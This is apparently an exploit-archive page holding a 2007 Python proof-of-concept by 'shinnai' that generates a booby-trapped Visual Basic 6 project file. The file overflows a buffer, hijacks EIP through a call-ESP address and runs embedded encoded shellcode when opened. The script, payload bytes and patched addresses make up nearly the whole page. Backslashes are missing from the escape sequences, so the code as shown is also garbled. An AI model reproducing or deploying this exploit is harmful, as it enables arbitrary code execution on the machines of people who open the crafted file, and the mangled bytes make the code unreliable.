[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution Exploit
# Published : 2007-09-19
# Author : shinnai
# Previous Title : PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability
# Next Title : AtomixMP3 2.3 (pls File) Local Buffer OverFlow Exploit
#usage: vbexploit.py FileName.vbp
import sys
print "--------------------------------------------------------------------------"
print " [PoC_2] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution "
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.orgn"
print " based on Koshi exploit"
print " http://www.milw0rm.com/exploits/4361n"
print " I try his exploit on Windows XP Pro SP2 Ita, full patched and it doesn't"
print " work, but he said:n"
print ' "# ...backwards..if you don' + "'t" + ' know why, then gtfo."n'
print " ok, now I know why brotha, I got this exception:n"
print ' "Access violation when writing to [63636363]"n'
print " so I search another way to get exploit working but I need to do some"
print ' changes to memory address ("00" became "20") and nop ("90" became "3F").'
print " Well, here it is a PoC_2 and if it doesn't work and" + ' "you don' + "'t know why,"
print ' then"' + "... feel free to ask ;)n"
print " dedicated to all Italian vb6 programmers... be safe bros"
print "--------------------------------------------------------------------------"
buff = "A" * 494
EIP = "x37x17x8Bx60"; #call ESP from VBSCC.DLL esp, you can (or must) change as you like
buff2 = "A" * 12
RW_Memory = "x20x20x01x20" #patched writeable memory address "x00x00x01x00"
nop = "x3Fx3Fx3Fx3F" #patched nop "x90"
shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"+
"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47"+
"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38"+
"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48"+
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"+
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+
"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58"+
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44"+
"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38"+
"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33"+
"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47"+
"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a"+
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b"+
"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33"+
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37"+
"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59"+
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56"+
"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a"
try:
vb_proj =
'Type=Exen'+
'Reference=*G{00020430-0000-0000-C000-000000000046}#2.0#0#......WINDOWS'+
'system32stdole2.tlb#OLE Automation' + buff + EIP + buff2 + RW_Memory + nop + shellcode + nop +
'nStartup="Sub Main"n'+
'Command32=""n'+
'Name=' + sys.argv[1]+
'nHelpContextID="0"n'+
'CompatibleMode="0"n'+
'MajorVer=1n'+
'MinorVer=0n'+
'RevisionVer=0n'+
'AutoIncrementVer=0n'+
'ServerSupportFiles=0n'+
'VersionCompanyName="xxx"n'+
'CompilationType=0n'+
'OptimizationType=0n'+
'FavorPentiumPro(tm)=0n'+
'CodeViewDebugInfo=0n'+
'NoAliasing=0n'+
'BoundsCheck=0n'+
'OverflowCheck=0n'+
'FlPointCheck=0n'+
'FDIVCheck=0n'+
'UnroundedFP=0n'+
'StartMode=0n'+
'Unattended=0n'+
'Retained=0n'+
'ThreadPerObject=0n'+
'MaxNumberOfThreads=1nn'+
'[MS Transaction Server]n'+
'AutoRefresh=1'
out_file = open(sys.argv[1],'w')
out_file.write(vb_proj)
out_file.close()
print "nFILE CREATION COMPLETED!n"
except:
print " n -------------------------------------"
print " Usage: exploit.py FileName.vbp"
print " -------------------------------------"
print "nAN ERROR OCCURS DURING FILE CREATION!"
# www.Syue.com [2007-09-19]